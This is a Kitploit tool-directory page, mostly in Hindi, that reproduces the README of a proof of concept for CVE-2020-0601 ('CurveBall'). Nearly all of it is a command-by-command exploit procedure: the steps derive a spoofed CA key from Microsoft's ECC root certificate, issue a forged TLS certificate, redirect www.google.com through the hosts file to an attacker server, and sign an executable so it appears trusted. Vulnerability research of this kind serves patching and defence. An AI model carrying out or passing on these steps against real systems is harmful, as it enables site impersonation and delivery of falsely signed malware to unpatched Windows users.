Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-0601_PoC — Demonstration of CVE-2020-0601 aka curveball. Based on the PoC's available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall | Kitploit
उपकरण/GitHubGitHub/joelbts/cve-2020-0601_poc
Vulnerability AnalysisCode AnalysisExploitationWeb SecurityCryptographyPenetration Testing
GitHubjoelbts/cve-2020-0601_poc

CVE-2020-0601_PoC

Demonstration of CVE-2020-0601 aka curveball. Based on the PoC's available at https://github.com/kudelskisecurity/chainoffools and https://github.com/ly4k/CurveBall

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

POC के आधार पर https://github.com/ly4k/CurveBall

https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/

https://github.com/kudelskisecurity/chainoffools?tab=readme-ov-file


आवश्यकताएँ/उपयोग किया गया सॉफ्टवेयर


python संस्करण 3.11 openssl संस्करण 3.1 osslsigncode संस्करण 2.5 gen-key.py और httpServer.py में पायथन लाइब्रेरीज़


TLS प्रमाणपत्र हस्ताक्षर


एक नकली CA कुंजी बनाएं विश्वसनीय रूट प्रमाणपत्र से (secp384r1 और PEM प्रारूप में होना चाहिए)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

एक नकली CA बनाएं नकली कुंजी का उपयोग करके

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca.cnf

एक और SSL प्रमाणपत्र बनाएं (किसी भी प्रकार का) जो नकली CA द्वारा हस्ताक्षरित किया जाएगा

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

प्रमाणपत्र के लिए एक प्रमाणपत्र हस्ताक्षर अनुरोध बनाएं

openssl req -new -key cert.key -out cert.csr -config openssl.cnf -reqexts v3_req

नकली CA प्रमाणपत्र का उपयोग करके CSR पर हस्ताक्षर करें

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl.cnf -extensions v3_req

नकली प्रमाणपत्र श्रृंखला के साथ एक HTTPS सर्वर प्रारंभ करें

python httpServer.py

विंडोज मशीन में

<kali.machine.ip> www.google.com को hosts फ़ाइल में जोड़ें (Google को सर्वर पर रीडायरेक्ट करता है)

HTTPS://www.google.com पर जाएं

प्रमाणपत्र विश्वसनीय होना चाहिए, और 'Hello World' प्रदर्शित होना चाहिए

यदि त्रुटि होती है, तो सुनिश्चित करें कि सिस्टम समय सही है


कोड हस्ताक्षर


एक नकली CA कुंजी बनाएं विश्वसनीय रूट प्रमाणपत्र से (secp384r1 और PEM प्रारूप में होना चाहिए)

python gen-key.py MicrosoftECCProductRootCertificateAuthority.cer

एक नकली CA बनाएं नकली कुंजी का उपयोग करके

openssl req -new -x509 -key spoofed-ca-key.pem -out spoofed-ca.pem -config ca-cs.cnf

एक नई कुंजी बनाएं जो कोड हस्ताक्षर के लिए उपयोग की जा सकती है

openssl ecparam -name secp384r1 -genkey -noout -out cert.key

कुंजी का उपयोग करके एक प्रमाणपत्र हस्ताक्षर अनुरोध बनाएं, जिस पर हम हस्ताक्षर कर सकते हैं

openssl req -new -key cert.key -out cert.csr -config openssl-cs.cnf -reqexts v3_req

नकली CA का उपयोग करके CSR पर हस्ताक्षर करें

openssl x509 -req -in cert.csr -CA spoofed-ca.pem -CAkey spoofed-ca-key.pem -CAcreateserial -out cert.crt -days 10000 -extfile openssl-cs.cnf -extensions v3_req

एक्सेस पर हस्ताक्षर करने के लिए कुंजी, प्रमाणपत्र, और नकली CA को एक PKCS12 फ़ाइल में पैक करें

openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile spoofed-ca.pem -name "Code Signing" -out cert.p12

एक निष्पादन योग्य फ़ाइल पर हस्ताक्षर करने के लिए PKCS12 फ़ाइल का उपयोग करें

osslsigncode sign -pkcs12 cert.p12 -n "Signed by curveball" -in filename.exe -out filename_signed.exe

टूल डाउनलोड करें